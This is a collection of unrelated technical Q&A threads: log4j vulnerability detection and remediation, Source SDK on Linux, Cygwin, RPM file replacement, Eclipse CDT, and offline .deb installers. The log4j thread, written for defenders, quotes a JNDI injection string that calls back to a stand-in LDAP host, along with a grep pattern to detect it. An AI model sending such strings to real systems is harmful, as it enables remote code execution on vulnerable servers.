Recently there was a log4j vulnerability reported:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://www.randori.com/blog/cve-2021-44228/
https://www.lunasec.io/docs/blog/log4j-zero-day/
How do I know whether my system has been attacked or exploited via injected arbitrary code?
Thank you so much
UPDATE: 2021-12-18...
Remember to always check for the latest information from the resources listed below
CVE-2021-45105... 2.16.0 and 2.12.2 are no longer valid remediations! The current fixing versions are 2.17.0 (Java 8) and 2.12.3 (Java 7). All other Java versions have to take the stop-gap approach (removing/deleting the JndiLookup.class file from the log4j-core JAR).
I have updated my message below accordingly.
Answering the question directly:
Reddit thread: log4j_0day_being_exploited has SEVERAL resources that can help you.
To detect the vulnerability
Ctrl+F for "Vendor Advisories". Check those lists to see if you are running any of that software. If you are and an update is available for it, update.
THEN Ctrl+F for ".class and .jar recursive hunter". Run the program there; if it finds anything, remediate. (A minimal scan sketch is shown after this list.)
You can also Ctrl+F for "Vulnerability Detection" if you want to perform a manual active test of your systems for the vulnerability.
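A minimal shell sketch of such a recursive scan (the search root / is an assumption; narrow it down for speed, and note this only inspects plain JARs, not nested/shaded archives):

find / -type f -name '*.jar' 2>/dev/null | while IFS= read -r jar; do
  unzip -l "$jar" 2>/dev/null | grep -q 'JndiLookup.class' && echo "contains JndiLookup.class: $jar"
done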
To detect exploitation... this is more complex, and all I can do is tell you to
Ctrl+F for "Vendor Advisories" and search through the material there... I'm not sure which option will be best for you.
More resources
https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/
This one has TONS of useful info, including detectors, even more resource links, very easy-to-understand remediation steps, and more.
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
https://github.com/cisagov/log4j-affected-db
https://logging.apache.org/log4j/2.x/security.html
Remediation:
CVE-2021-45046 ... CVE-2021-44228 ... CVE-2021-45105
While most people that need to know probably already know enough to do what they need to do, I thought I would still put this just in case...
Follow the guidance in those resources... it may change, but
As of 2021-12-18
It's basically
Remove log4j-core JAR files if possible
from both running machines (for an immediate fix) AND
from your source code / source control files (to prevent future builds/releases/deployments from undoing the change)
If that is not possible (due to a dependency), upgrade them
If you are running Java 8, then you can upgrade to log4j 2.17.0+
If you are running Java 7, then you can upgrade to log4j 2.12.3
If you are running an older version of Java, then you need to upgrade to the newest version of Java and then use the newest version of log4j
Again, these changes have to happen both on running machines and in code
If neither of those is possible for some reason... then there is the NON-remediation stop gap of removing the JndiLookup.class file from the log4j-core JARs.
There is a one-liner for the stop gap option on Linux using the zip command that comes packaged with most Linux distros by default.
zip -q -d "$LOG4J_JAR_PATH" org/apache/logging/log4j/core/lookup/JndiLookup.class
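To apply that to every log4j-core JAR on a machine, a loop like this may help (the search root /opt is an assumption; adjust it, and test outside production first):

find /opt -type f -name 'log4j-core-*.jar' 2>/dev/null | while IFS= read -r LOG4J_JAR_PATH; do
  zip -q -d "$LOG4J_JAR_PATH" org/apache/logging/log4j/core/lookup/JndiLookup.class
done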
At the time of writing, most of the guides online for the stop-gap option on Windows say to do the following (again... assuming you can't do one of the remove-JAR or upgrade options above):
Install something like 7-zip
Locate all of your log4j-core JAR files and for each one do the following...
Rename the JAR to change the extension to .zip
Use 7-zip to unzip the JAR (which now has a .zip extension)
Locate and remove the JndiLookup.class file from the unzipped folder
The path is \path\to\unzippedFolder\org\apache\logging\log4j\core\lookup\JndiLookup.class
Delete the old JAR file (which now has an extension of .zip)
Use 7-zip to RE-zip the folder
Rename the new .zip file to change the extension back to .jar
There are also some options to use PowerShell
Reddit thread: log4j_0day_being_exploited
Ctrl+F for "PowerShell"
This is fine if you only have one or two JAR files to deal with and you don't mind installing 7-zip, or you have PowerShell available to do it. However, if you have lots of JAR files, or if you don't want to install 7-zip and don't have access to PowerShell, I created an open-source VBS script that will do it for you without needing to install any additional software: https://github.com/CrazyKidJack/Windowslog4jClassRemover
Read the README and the Release Notes https://github.com/CrazyKidJack/Windowslog4jClassRemover/releases/latest
You can check your request logs for entries that look like this:
${jndi:ldap://example.com:1234/callback}
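A rough way to scan existing logs for un-obfuscated attempts is a recursive grep (the /var/log/ path is an assumption; note that attackers commonly obfuscate the lookup string, so a clean result does not prove you were not probed):

grep -r -i -E '\$\{jndi:(ldap|ldaps|rmi|dns)' /var/log/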
If you want to check whether you can be attacked, you can run a PoC from GitHub. This link seems to be the first PoC released; you can now find others.
You can also find a black-box test here.
I'm just trying to set up Valve's Source SDK 2013 for Linux, but I have to say that I find the wiki + documentation rather confusing and partly heavily outdated (Windows-only instructions, instructions only for GoldSrc / pre-20XX SDKs, etc.).
I hope that someone who already has gone through the hassle can supply me with some hints on how to correctly set up the system.
I tried to use some of the Windows-specific instructions to understand the system, but much of it is highly platform-specific.
So here is the current status (I based what I did on this wiki page: Wiki: Source SDK 2013):
The source of the Source SDK 2013 from GitHub is cloned to
~/Git/source-sdk-2013/
the Source SDK Base 2013 is installed via Steam, and the steam-runtime is extracted to
~/working/steam-runtime-sdk_2013-09-05/
I was not sure whether there is a specific path I should put the steam runtime into so I just put it into my self-created working dir.
# Create a Multiplayer sample project
export SDKROOT=~/Git/source-sdk-2013 # left unquoted so the ~ expands
bash $SDKROOT/mp/src/creategameprojects
bash $SDKROOT/mp/src/createallprojects
# Setup Steam Runtime
export STEAMRT=~/working/steam-runtime-sdk_2013-09-05/ # left unquoted so the ~ expands
cd $STEAMRT
# Choose all build targets (i386 + amd64) and download these
./setup.sh
# Set the current target to the same as the host machine (i.e. amd64)
./shell.sh
# Compile the actual game
make -f $SDKROOT/mp/src/games.mak
I have not yet touched any source files, as there's plenty of source already supplied. I just wanted to confirm I have a working toolchain set up.
This all compiles fine, but in the end the script wants to chmod the client.so and server.so and claims they were "not found" – sadly without any information about where it searched for them. Actually, these files do exist in
$SDKROOT/mp/game/mod_hl2mp/bin
and even marked as executable (-rwxr-xr-x).
So I just ignored this and hoped for the best. The next line sounds a bit strange to me:
At this point you should have client.so and server.so files to load with the Source SDK Base 2013 of your choice.
So I should be able to load the files with "the Source SDK Base 2013" (of your choice?!? Valve is the only one providing it O.o). How am I supposed to do that? I have not found any hint whatsoever about that, sadly.
But it points me to the README.txt of the steam-runtime, which tells me to do this:
run.sh ./MyGame
But where's the executable? I only have .so files.
And this is the point where I currently am. I'm quite confused as I have many questions now:
Why do only Linux users need to download the steam runtime? What if I don't want to ship via Steam?
Is that chmod failure a script failure or a mistake in my directory setup?
How do I load these libraries via the SDK Base?
Where is the binary? I'm quite confused here...
Have I overlooked something?
I appreciate any hints or links to resources, or maybe explanations if I was just too dumb to understand what they mean :P
EDIT: Actually there is a GitHub repo for the steam-runtime too (GitHub/steam-runtime) – why is the download so outdated? The Git repo has some updated stuff going on. Which one should I choose?
With the help of a friend (I didn't expect to be able to answer this; he didn't know about Linux, but together we could figure it out), I was able to solve it faster than expected.
To "load" the game via the Steam SDK Base just append the -game parameter and point it to the directory with the gameinfo.txt (ie. $SDKROOT/mp/game/mod_hl2mp/) in it.
Alternatively just copy the contents of this directory to
~/.local/share/Steam/steamapps/sourcemods/$MYSOURCEMOD
where $MYSOURCEMOD is whatever you want to call it (do not use spaces). Then add a steam.inf file in that dir with the following content:
appID=243750
ProductName=$MYSOURCEMOD
PatchVersion=1.0.0.0
After a restart Steam will be able to find the sourcemod.
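A minimal sketch of those steps (the mod name "mymod" and the default Steam path are assumptions):

MYSOURCEMOD=mymod
MODDIR="$HOME/.local/share/Steam/steamapps/sourcemods/$MYSOURCEMOD"
mkdir -p "$MODDIR"
cp -r "$SDKROOT/mp/game/mod_hl2mp/." "$MODDIR"
printf 'appID=243750\nProductName=%s\nPatchVersion=1.0.0.0\n' "$MYSOURCEMOD" > "$MODDIR/steam.inf"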
I'm not quite sure what the "steam-runtime" thingy is, but I suppose it is there to set up the build environment (to use a custom gcc etc.), as that is what the scripts appear to do. I'm not sure why you should run the game via the run.sh in the bin/ subfolder of the runtime instead of via Steam or via the parameter on the Source SDK Base, but maybe someone can enlighten me here.
The archive you are supposed to download is only a downloader/configurator for the steam-runtime hosted on GitHub.
I have a standalone server running Cygwin -- I did not set up this server; it was inherited. Anyway, I'd like to know what options the installing admin selected in the setup program.
I've read that I could look in /etc/setup, /etc/postinstall, or /etc/preremove but there are a lot of packages in those directories... same goes for the output of cygcheck -c.
I don't want to know every single library on the system... just how to duplicate the install. Is there a way to determine which packages were selected in the GUI setup program?
Thanks!
Cygwin is pretty standalone. You should be able to archive up the entire Cygwin directory (and subdirectories) and move it to the same location on another system.
If you archive it up, I recommend 7-zip (you can get it free here). The built-in Windows archiver can create permission problems when an archive is extracted on a destination system, so I recommend 7-zip for both archiving and unarchiving. If you use the built-in Windows archiver, then move the archive to the new system and extract it, it will extract without errors, but you may find that things don't actually work right while using some Cygwin applications.
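A sketch of the round trip with the 7-Zip command line (assuming Cygwin lives in C:\cygwin and 7z.exe is on your PATH):

7z a cygwin-backup.7z C:\cygwin

and on the destination system:

7z x cygwin-backup.7z -oC:\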
If you don't copy everything, you risk losing the original admin's custom changes.
I have several applications that I wish to deploy using rpm. Some of the files in my application deployments override files from other deployed packages. Simply including the new files in the deployment package will cause rpm conflicts.
I am looking for the proper way to use rpm to update/replace already installed files.
I have already come up with a few solutions but nothing seems quite right.
1. Maintain custom versions of the RPMs containing the original files.
This seems like a large amount of work for a relatively small reward, even though it feels less like a hack than some of the other possible solutions.
2. Include the files in the RPM under another name and copy them over in the %post section.
This would work, but it means littering the system with multiple copies of the files. It also means additional maintenance in the RPM build spec for each file.
3. Use wget in the %post section to replace the original files from some known server.
This is similar to the copy technique, but the files wouldn't even live in the RPM. It might act like a nice central configuration authority, though.
4. Deploy the files as new files, then use symlinks to override the originals.
This is also similar to the copy technique but with less clutter. The problem here is that some files don't behave well as symlinks.
To the best of my knowledge, RPM is not designed to permit updating / replacing existing files, so anything that you do is going to be a hack.
Of the options you list, I'd choose #1 as the least bad hack if the target systems are systems that I admin (as you say, it's more work but is the cleanest solution) and a combination of #2 and #4 (symlinks where possible, copies where not) if I'm creating the RPMs for others' systems (to avoid having to distribute a bunch of RPMs, but I'd make it very clear in the docs what I'm doing).
You haven't described which files need to be updated or replaced and how they need to be updated. Depending on the answers to those questions, you may have a couple of other options:
Many programs are designed to use a single default configuration file and also to grab configuration files from a .d subdirectory. For example, Apache uses /etc/httpd/conf/httpd.conf and /etc/httpd/conf.d/*.conf, so your RPMs could drop files under /etc/httpd/conf.d instead of modifying /etc/httpd/conf/httpd.conf. And if the files that you need to modify are config files that don't follow this pattern but could be made to, you can suggest to the package maintainers that they add this capability; this wouldn't help you immediately but would make future releases easier.
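For example, a hypothetical drop-in your RPM could install (the file name and directive are only illustrations):

cat > /etc/httpd/conf.d/myapp.conf <<'EOF'
Alias /myapp /opt/myapp/htdocs
EOF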
For command-line utilities like sendmail and lpr that can be provided by multiple packages, the alternatives system (see man alternatives) permits more than 1 RPM that provides these utilities to be installed side by side. Again, if the files that you need to modify are command-line utilities that don't follow this pattern but could be made to, you can suggest to the package maintainers that they add this capability.
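A sketch of registering a hypothetical alternative (the paths and priority are made up; on Debian-family systems the command is update-alternatives):

alternatives --install /usr/bin/lpr lpr /opt/myapp/bin/lpr 50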
Config file changes on systems that you administer are better managed through a tool like Cfengine or Puppet rather than through custom RPMs. I think that Red Hat favors Puppet.
If I were creating the RPMs for systems I don't administer, I'd consider using a third-party tool like Bitrock and dumping all of my stuff under /opt just so I wouldn't have to stomp on files installed by other admins' RPMs.
Edit (2019): Nowadays, Software Collections offers a useful alternative. You can create packages that install somewhere under /opt, and the Software Collections tools offer a standardized way for users to opt in to using those instead of whatever's normally installed under /usr. Red Hat uses this to distribute newer versions of tools for their otherwise stable and long-lived (i.e., older) Red Hat Enterprise Linux distributions.
You can also execute rpm -U --replacefiles --replacepkgs ..., which will give you what you want.
See here for more info on RPM %files directives:
http://www.rpm.org/max-rpm/s1-rpm-inside-files-list-directives.html
You can use the arguments from the %post and %pre sections in the RPM scriptlets to determine if you are installing, upgrading or removing packages.
If $1 is 0 - then we're removing the last copy of the package; 0 copies will remain installed.
If $1 is 1 - then we're doing a fresh install; a total of 1 copy will be installed.
If $1 is 2 or more - then we're upgrading this package, and $1 counts the copies involved (the new one plus those already installed).
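A minimal scriptlet sketch using that argument (the echo lines are placeholders for your real migration logic):

%post
if [ "$1" -eq 1 ]; then
    echo "fresh install"    # first copy of this package on the system
elif [ "$1" -ge 2 ]; then
    echo "upgrade"          # an older copy is being replaced
fi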
These sections help with managing files among the versions.
Keep track of what you're doing between versions, and consider what might happen if a user skips a version or two.
Have consideration for these things and you should be good to go!
What files can be safely removed from CDT project and workspace before archiving or saving in a source control system?
Having MSVC experience, I tried to remove the Debug and Release directories; this was a really bad idea :(
Are you using an Eclipse plug-in for your version control system of choice? They seem to take care of everything (at least in my experience with the CVS and Mercurial plugins). If not, you'll need to tell Eclipse to refresh pretty much your whole project whenever you've interacted with version control.
The contents of the Debug and Release directories should all be autogenerated. If they're not, something's wrong.
Rather than what you can delete, turn it around and consider what you need to keep (see the archive sketch after this list):
.project, .cproject and (if it exists) .settings
Your source directories
Your include directories
Any other human-created files at the top level e.g. Changelog, documentation
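For example, an archive of just those files might look like this (the src/ and include/ names are assumptions; adjust to your project layout):

tar czf myproject.tar.gz .project .cproject .settings src/ include/ Changelog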
It may also be worthwhile looking inside the .metadata directory in your workspace root; for example, any launch configurations you have created are stored by default in .metadata/.plugins/org.eclipse.debug.core/.launches/ . (Although I have seen them inside project directories from time to time.)
I'm trying to update our installer so a user can simply double-click on a file and have all the dependencies and our software installed easily. This is a suite of applications that will be deployed on a clean Ubuntu 8.04 (Hardy Heron) installation. I have investigated making a .deb file, but listing the dependencies doesn't work, because there isn't any Internet access available. And any script that would set up a local APT repository would still need to be run from the command line. Is there a way to put a .deb file inside of a .deb file?
I know many companies ship shell scripts that you have to chmod +x and then execute. This is not acceptable. It is ridiculous that this isn't possible, especially considering the distribution and architecture are fixed.
If you are totally confident that it will be installed on the same system every time, you can find the list of package dependencies yourself, fetch them from the Ubuntu repositories, and package them up with your software. You just have to be clear that your software is for a specific version, and you'll probably have to deal with things like keeping up with maintenance releases.
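A sketch of collecting those dependencies on a machine that does have Internet access (the package name is an example):

# download mypackage and its dependencies into /var/cache/apt/archives without installing
sudo apt-get --download-only install mypackage

Then copy the downloaded .deb files onto your installation media.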
You can also easily install with a script. As for your complaint about making scripts executable, well, I don't know how you're shipping your product, but since you say it's going somewhere without Internet access, I assume it's going to be copied from some kind of media. If you make the script executable when you put it on that media, you're done.
If you'd like to do this using packages, you can create a CD-ROM which contains a package repository. You can find all kinds of information on this with a web search. For starters, try APTonCD - it's a GUI for doing it: http://aptoncd.sourceforge.net/
A makeself self-extracting executable that starts the install script using sudo will work.
The user can either run it from a terminal (after chmod-ing it) or can double-click it and tell it to "Run" from the prompt.
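A sketch of building such an installer with makeself (the directory, file, and label names are assumptions):

makeself.sh ./installer-files my-suite-installer.run "My Software Suite" ./install.sh

Here ./installer-files would contain your .deb files plus an install.sh that installs them (e.g. with the dpkg -i call shown at the end of this page).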
It's possible to put .deb files inside .deb files. The only thing you need to do is configure the appropriate scripts.
A .deb-file consists of:
1x control.tar.gz: contains a file "control" (describes the package) and optional files like "postinst" (a script executed right after extraction). There are other files you might include, and a web search should turn up information about the available scripts.
1x data.tar.gz: contains a structure of the root filesystem with the files/folders that need to be (re)placed. Additionally, you may configure the behaviour in the mentioned scripts.
1x debian-binary: as far as I remember, this is simply a version number in a file. I don't know exactly what it means; just remember that in most cases this is 2.0.
So you may now put your .deb files in the data package. Those are extracted by your script... and installed using:
# dpkg -i yourpackage1.deb yourpackage2.deb
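A minimal sketch of such an install script (the /opt/mysuite/debs path is an assumption; note that calling dpkg -i from inside a package's own postinst can fail because dpkg's database is locked during installation, so running it from a standalone script is safer):

#!/bin/sh
set -e
# install every bundled package that was shipped in data.tar.gz
dpkg -i /opt/mysuite/debs/*.deb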